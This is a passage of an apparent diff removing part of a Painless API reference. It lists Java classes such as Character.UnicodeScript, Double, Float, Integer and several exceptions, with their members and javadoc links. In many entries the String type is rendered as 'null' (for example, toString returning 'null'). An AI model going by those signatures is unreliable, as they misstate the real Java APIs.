{java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#HEBREW[HEBREW] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#HIRAGANA[HIRAGANA] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#IMPERIAL_ARAMAIC[IMPERIAL_ARAMAIC] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#INHERITED[INHERITED] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#INSCRIPTIONAL_PAHLAVI[INSCRIPTIONAL_PAHLAVI] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#INSCRIPTIONAL_PARTHIAN[INSCRIPTIONAL_PARTHIAN] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#JAVANESE[JAVANESE] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#KAITHI[KAITHI] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#KANNADA[KANNADA] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#KATAKANA[KATAKANA] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#KAYAH_LI[KAYAH_LI] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#KHAROSHTHI[KHAROSHTHI] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#KHMER[KHMER] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#LAO[LAO] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#LATIN[LATIN] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#LEPCHA[LEPCHA] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#LIMBU[LIMBU] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#LINEAR_B[LINEAR_B] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#LISU[LISU] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#LYCIAN[LYCIAN] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#LYDIAN[LYDIAN] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#MALAYALAM[MALAYALAM] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#MANDAIC[MANDAIC] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#MEETEI_MAYEK[MEETEI_MAYEK] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#MEROITIC_CURSIVE[MEROITIC_CURSIVE] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#MEROITIC_HIEROGLYPHS[MEROITIC_HIEROGLYPHS] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#MIAO[MIAO] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#MONGOLIAN[MONGOLIAN] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#MYANMAR[MYANMAR] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#NEW_TAI_LUE[NEW_TAI_LUE] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#NKO[NKO] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#OGHAM[OGHAM] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#OLD_ITALIC[OLD_ITALIC] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#OLD_PERSIAN[OLD_PERSIAN] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#OLD_SOUTH_ARABIAN[OLD_SOUTH_ARABIAN] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#OLD_TURKIC[OLD_TURKIC] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#OL_CHIKI[OL_CHIKI] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#ORIYA[ORIYA] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#OSMANYA[OSMANYA] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#PHAGS_PA[PHAGS_PA] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#PHOENICIAN[PHOENICIAN] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#REJANG[REJANG] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#RUNIC[RUNIC] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#SAMARITAN[SAMARITAN] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#SAURASHTRA[SAURASHTRA] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#SHARADA[SHARADA] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#SHAVIAN[SHAVIAN] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#SINHALA[SINHALA] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#SORA_SOMPENG[SORA_SOMPENG] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#SUNDANESE[SUNDANESE] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#SYLOTI_NAGRI[SYLOTI_NAGRI] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#SYRIAC[SYRIAC] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#TAGALOG[TAGALOG] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#TAGBANWA[TAGBANWA] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#TAI_LE[TAI_LE] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#TAI_THAM[TAI_THAM] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#TAI_VIET[TAI_VIET] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#TAKRI[TAKRI] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#TAMIL[TAMIL] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#TELUGU[TELUGU] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#THAANA[THAANA] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#THAI[THAI] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#TIBETAN[TIBETAN] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#TIFINAGH[TIFINAGH] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#UGARITIC[UGARITIC] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#UNKNOWN[UNKNOWN] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#VAI[VAI] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#YI[YI] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#forName(java.lang.String)[forName](null) -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#of(int)[of](int) -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#valueOf(java.lang.String)[valueOf](null) -* static Character.UnicodeScript[] {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#values()[values]() -* int {java11-javadoc}/java.base/java/lang/Enum.html#compareTo(java.lang.Enum)[compareTo](Enum) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Enum.html#name()[name]() -* int {java11-javadoc}/java.base/java/lang/Enum.html#ordinal()[ordinal]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ClassCastException]] -==== ClassCastException -* {java11-javadoc}/java.base/java/lang/ClassCastException.html#()[ClassCastException]() -* {java11-javadoc}/java.base/java/lang/ClassCastException.html#(java.lang.String)[ClassCastException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ClassNotFoundException]] -==== ClassNotFoundException -* {java11-javadoc}/java.base/java/lang/ClassNotFoundException.html#()[ClassNotFoundException]() -* {java11-javadoc}/java.base/java/lang/ClassNotFoundException.html#(java.lang.String)[ClassNotFoundException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-CloneNotSupportedException]] -==== CloneNotSupportedException -* {java11-javadoc}/java.base/java/lang/CloneNotSupportedException.html#()[CloneNotSupportedException]() -* {java11-javadoc}/java.base/java/lang/CloneNotSupportedException.html#(java.lang.String)[CloneNotSupportedException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Comparable]] -==== Comparable -* int {java11-javadoc}/java.base/java/lang/Comparable.html#compareTo(java.lang.Object)[compareTo](def) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Double]] -==== Double -* static int {java11-javadoc}/java.base/java/lang/Double.html#BYTES[BYTES] -* static int {java11-javadoc}/java.base/java/lang/Double.html#MAX_EXPONENT[MAX_EXPONENT] -* static double {java11-javadoc}/java.base/java/lang/Double.html#MAX_VALUE[MAX_VALUE] -* static int {java11-javadoc}/java.base/java/lang/Double.html#MIN_EXPONENT[MIN_EXPONENT] -* static double {java11-javadoc}/java.base/java/lang/Double.html#MIN_NORMAL[MIN_NORMAL] -* static double {java11-javadoc}/java.base/java/lang/Double.html#MIN_VALUE[MIN_VALUE] -* static double {java11-javadoc}/java.base/java/lang/Double.html#NEGATIVE_INFINITY[NEGATIVE_INFINITY] -* static double {java11-javadoc}/java.base/java/lang/Double.html#NaN[NaN] -* static double {java11-javadoc}/java.base/java/lang/Double.html#POSITIVE_INFINITY[POSITIVE_INFINITY] -* static int {java11-javadoc}/java.base/java/lang/Double.html#SIZE[SIZE] -* static int {java11-javadoc}/java.base/java/lang/Double.html#compare(double,double)[compare](double, double) -* static long {java11-javadoc}/java.base/java/lang/Double.html#doubleToLongBits(double)[doubleToLongBits](double) -* static long {java11-javadoc}/java.base/java/lang/Double.html#doubleToRawLongBits(double)[doubleToRawLongBits](double) -* static int {java11-javadoc}/java.base/java/lang/Double.html#hashCode(double)[hashCode](double) -* static boolean {java11-javadoc}/java.base/java/lang/Double.html#isFinite(double)[isFinite](double) -* static boolean {java11-javadoc}/java.base/java/lang/Double.html#isInfinite(double)[isInfinite](double) -* static boolean {java11-javadoc}/java.base/java/lang/Double.html#isNaN(double)[isNaN](double) -* static double {java11-javadoc}/java.base/java/lang/Double.html#longBitsToDouble(long)[longBitsToDouble](long) -* static double {java11-javadoc}/java.base/java/lang/Double.html#max(double,double)[max](double, double) -* static double {java11-javadoc}/java.base/java/lang/Double.html#min(double,double)[min](double, double) -* static double {java11-javadoc}/java.base/java/lang/Double.html#parseDouble(java.lang.String)[parseDouble](null) -* static double {java11-javadoc}/java.base/java/lang/Double.html#sum(double,double)[sum](double, double) -* static null {java11-javadoc}/java.base/java/lang/Double.html#toHexString(double)[toHexString](double) -* static null {java11-javadoc}/java.base/java/lang/Double.html#toString(double)[toString](double) -* static Double {java11-javadoc}/java.base/java/lang/Double.html#valueOf(double)[valueOf](double) -* byte {java11-javadoc}/java.base/java/lang/Number.html#byteValue()[byteValue]() -* int {java11-javadoc}/java.base/java/lang/Double.html#compareTo(java.lang.Double)[compareTo](Double) -* double {java11-javadoc}/java.base/java/lang/Number.html#doubleValue()[doubleValue]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* float {java11-javadoc}/java.base/java/lang/Number.html#floatValue()[floatValue]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/Number.html#intValue()[intValue]() -* boolean {java11-javadoc}/java.base/java/lang/Double.html#isInfinite()[isInfinite]() -* boolean {java11-javadoc}/java.base/java/lang/Double.html#isNaN()[isNaN]() -* long {java11-javadoc}/java.base/java/lang/Number.html#longValue()[longValue]() -* short {java11-javadoc}/java.base/java/lang/Number.html#shortValue()[shortValue]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Enum]] -==== Enum -* int {java11-javadoc}/java.base/java/lang/Enum.html#compareTo(java.lang.Enum)[compareTo](Enum) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Enum.html#name()[name]() -* int {java11-javadoc}/java.base/java/lang/Enum.html#ordinal()[ordinal]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-EnumConstantNotPresentException]] -==== EnumConstantNotPresentException -* null {java11-javadoc}/java.base/java/lang/EnumConstantNotPresentException.html#constantName()[constantName]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Exception]] -==== Exception -* {java11-javadoc}/java.base/java/lang/Exception.html#()[Exception]() -* {java11-javadoc}/java.base/java/lang/Exception.html#(java.lang.String)[Exception](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Float]] -==== Float -* static int {java11-javadoc}/java.base/java/lang/Float.html#BYTES[BYTES] -* static int {java11-javadoc}/java.base/java/lang/Float.html#MAX_EXPONENT[MAX_EXPONENT] -* static float {java11-javadoc}/java.base/java/lang/Float.html#MAX_VALUE[MAX_VALUE] -* static int {java11-javadoc}/java.base/java/lang/Float.html#MIN_EXPONENT[MIN_EXPONENT] -* static float {java11-javadoc}/java.base/java/lang/Float.html#MIN_NORMAL[MIN_NORMAL] -* static float {java11-javadoc}/java.base/java/lang/Float.html#MIN_VALUE[MIN_VALUE] -* static float {java11-javadoc}/java.base/java/lang/Float.html#NEGATIVE_INFINITY[NEGATIVE_INFINITY] -* static float {java11-javadoc}/java.base/java/lang/Float.html#NaN[NaN] -* static float {java11-javadoc}/java.base/java/lang/Float.html#POSITIVE_INFINITY[POSITIVE_INFINITY] -* static int {java11-javadoc}/java.base/java/lang/Float.html#SIZE[SIZE] -* static int {java11-javadoc}/java.base/java/lang/Float.html#compare(float,float)[compare](float, float) -* static int {java11-javadoc}/java.base/java/lang/Float.html#floatToIntBits(float)[floatToIntBits](float) -* static int {java11-javadoc}/java.base/java/lang/Float.html#floatToRawIntBits(float)[floatToRawIntBits](float) -* static int {java11-javadoc}/java.base/java/lang/Float.html#hashCode(float)[hashCode](float) -* static float {java11-javadoc}/java.base/java/lang/Float.html#intBitsToFloat(int)[intBitsToFloat](int) -* static boolean {java11-javadoc}/java.base/java/lang/Float.html#isFinite(float)[isFinite](float) -* static boolean {java11-javadoc}/java.base/java/lang/Float.html#isInfinite(float)[isInfinite](float) -* static boolean {java11-javadoc}/java.base/java/lang/Float.html#isNaN(float)[isNaN](float) -* static float {java11-javadoc}/java.base/java/lang/Float.html#max(float,float)[max](float, float) -* static float {java11-javadoc}/java.base/java/lang/Float.html#min(float,float)[min](float, float) -* static float {java11-javadoc}/java.base/java/lang/Float.html#parseFloat(java.lang.String)[parseFloat](null) -* static float {java11-javadoc}/java.base/java/lang/Float.html#sum(float,float)[sum](float, float) -* static null {java11-javadoc}/java.base/java/lang/Float.html#toHexString(float)[toHexString](float) -* static null {java11-javadoc}/java.base/java/lang/Float.html#toString(float)[toString](float) -* static Float {java11-javadoc}/java.base/java/lang/Float.html#valueOf(float)[valueOf](float) -* byte {java11-javadoc}/java.base/java/lang/Number.html#byteValue()[byteValue]() -* int {java11-javadoc}/java.base/java/lang/Float.html#compareTo(java.lang.Float)[compareTo](Float) -* double {java11-javadoc}/java.base/java/lang/Number.html#doubleValue()[doubleValue]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* float {java11-javadoc}/java.base/java/lang/Number.html#floatValue()[floatValue]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/Number.html#intValue()[intValue]() -* boolean {java11-javadoc}/java.base/java/lang/Float.html#isInfinite()[isInfinite]() -* boolean {java11-javadoc}/java.base/java/lang/Float.html#isNaN()[isNaN]() -* long {java11-javadoc}/java.base/java/lang/Number.html#longValue()[longValue]() -* short {java11-javadoc}/java.base/java/lang/Number.html#shortValue()[shortValue]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-IllegalAccessException]] -==== IllegalAccessException -* {java11-javadoc}/java.base/java/lang/IllegalAccessException.html#()[IllegalAccessException]() -* {java11-javadoc}/java.base/java/lang/IllegalAccessException.html#(java.lang.String)[IllegalAccessException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-IllegalArgumentException]] -==== IllegalArgumentException -* {java11-javadoc}/java.base/java/lang/IllegalArgumentException.html#()[IllegalArgumentException]() -* {java11-javadoc}/java.base/java/lang/IllegalArgumentException.html#(java.lang.String)[IllegalArgumentException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-IllegalMonitorStateException]] -==== IllegalMonitorStateException -* {java11-javadoc}/java.base/java/lang/IllegalMonitorStateException.html#()[IllegalMonitorStateException]() -* {java11-javadoc}/java.base/java/lang/IllegalMonitorStateException.html#(java.lang.String)[IllegalMonitorStateException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-IllegalStateException]] -==== IllegalStateException -* {java11-javadoc}/java.base/java/lang/IllegalStateException.html#()[IllegalStateException]() -* {java11-javadoc}/java.base/java/lang/IllegalStateException.html#(java.lang.String)[IllegalStateException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-IllegalThreadStateException]] -==== IllegalThreadStateException -* {java11-javadoc}/java.base/java/lang/IllegalThreadStateException.html#()[IllegalThreadStateException]() -* {java11-javadoc}/java.base/java/lang/IllegalThreadStateException.html#(java.lang.String)[IllegalThreadStateException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-IndexOutOfBoundsException]] -==== IndexOutOfBoundsException -* {java11-javadoc}/java.base/java/lang/IndexOutOfBoundsException.html#()[IndexOutOfBoundsException]() -* {java11-javadoc}/java.base/java/lang/IndexOutOfBoundsException.html#(java.lang.String)[IndexOutOfBoundsException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-InstantiationException]] -==== InstantiationException -* {java11-javadoc}/java.base/java/lang/InstantiationException.html#()[InstantiationException]() -* {java11-javadoc}/java.base/java/lang/InstantiationException.html#(java.lang.String)[InstantiationException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Integer]] -==== Integer -* static int {java11-javadoc}/java.base/java/lang/Integer.html#BYTES[BYTES] -* static int {java11-javadoc}/java.base/java/lang/Integer.html#MAX_VALUE[MAX_VALUE] -* static int {java11-javadoc}/java.base/java/lang/Integer.html#MIN_VALUE[MIN_VALUE] -* static int {java11-javadoc}/java.base/java/lang/Integer.html#SIZE[SIZE] -* static int {java11-javadoc}/java.base/java/lang/Integer.html#bitCount(int)[bitCount](int) -* static int {java11-javadoc}/java.base/java/lang/Integer.html#compare(int,int)[compare](int, int) -* static int {java11-javadoc}/java.base/java/lang/Integer.html#compareUnsigned(int,int)[compareUnsigned](int, int) -* static Integer {java11-javadoc}/java.base/java/lang/Integer.html#decode(java.lang.String)[decode](null) -* static int {java11-javadoc}/java.base/java/lang/Integer.html#divideUnsigned(int,int)[divideUnsigned](int, int) -* static int {java11-javadoc}/java.base/java/lang/Integer.html#hashCode(int)[hashCode](int) -* static int {java11-javadoc}/java.base/java/lang/Integer.html#highestOneBit(int)[highestOneBit](int) -* static int {java11-javadoc}/java.base/java/lang/Integer.html#lowestOneBit(int)[lowestOneBit](int) -* static int {java11-javadoc}/java.base/java/lang/Integer.html#max(int,int)[max](int, int) -* static int {java11-javadoc}/java.base/java/lang/Integer.html#min(int,int)[min](int, int) -* static int {java11-javadoc}/java.base/java/lang/Integer.html#numberOfLeadingZeros(int)[numberOfLeadingZeros](int) -* static int {java11-javadoc}/java.base/java/lang/Integer.html#numberOfTrailingZeros(int)[numberOfTrailingZeros](int) -* static int {java11-javadoc}/java.base/java/lang/Integer.html#parseInt(java.lang.String)[parseInt](null) -* static int {java11-javadoc}/java.base/java/lang/Integer.html#parseInt(java.lang.String,int)[parseInt](null, int) -* static int {java11-javadoc}/java.base/java/lang/Integer.html#parseUnsignedInt(java.lang.String)[parseUnsignedInt](null) -* static int {java11-javadoc}/java.base/java/lang/Integer.html#parseUnsignedInt(java.lang.String,int)[parseUnsignedInt](null, int) -* static int {java11-javadoc}/java.base/java/lang/Integer.html#remainderUnsigned(int,int)[remainderUnsigned](int, int) -* static int {java11-javadoc}/java.base/java/lang/Integer.html#reverse(int)[reverse](int) -* static int {java11-javadoc}/java.base/java/lang/Integer.html#reverseBytes(int)[reverseBytes](int) -* static int {java11-javadoc}/java.base/java/lang/Integer.html#rotateLeft(int,int)[rotateLeft](int, int) -* static int {java11-javadoc}/java.base/java/lang/Integer.html#rotateRight(int,int)[rotateRight](int, int) -* static int {java11-javadoc}/java.base/java/lang/Integer.html#signum(int)[signum](int) -* static null {java11-javadoc}/java.base/java/lang/Integer.html#toBinaryString(int)[toBinaryString](int) -* static null {java11-javadoc}/java.base/java/lang/Integer.html#toHexString(int)[toHexString](int) -* static null {java11-javadoc}/java.base/java/lang/Integer.html#toOctalString(int)[toOctalString](int) -* static null {java11-javadoc}/java.base/java/lang/Integer.html#toString(int)[toString](int) -* static null {java11-javadoc}/java.base/java/lang/Integer.html#toString(int,int)[toString](int, int) -* static long {java11-javadoc}/java.base/java/lang/Integer.html#toUnsignedLong(int)[toUnsignedLong](int) -* static null {java11-javadoc}/java.base/java/lang/Integer.html#toUnsignedString(int)[toUnsignedString](int) -* static null {java11-javadoc}/java.base/java/lang/Integer.html#toUnsignedString(int,int)[toUnsignedString](int, int) -* static Integer {java11-javadoc}/java.base/java/lang/Integer.html#valueOf(int)[valueOf](int) -* static Integer {java11-javadoc}/java.base/java/lang/Integer.html#valueOf(java.lang.String,int)[valueOf](null, int) -* byte {java11-javadoc}/java.base/java/lang/Number.html#byteValue()[byteValue]() -* int 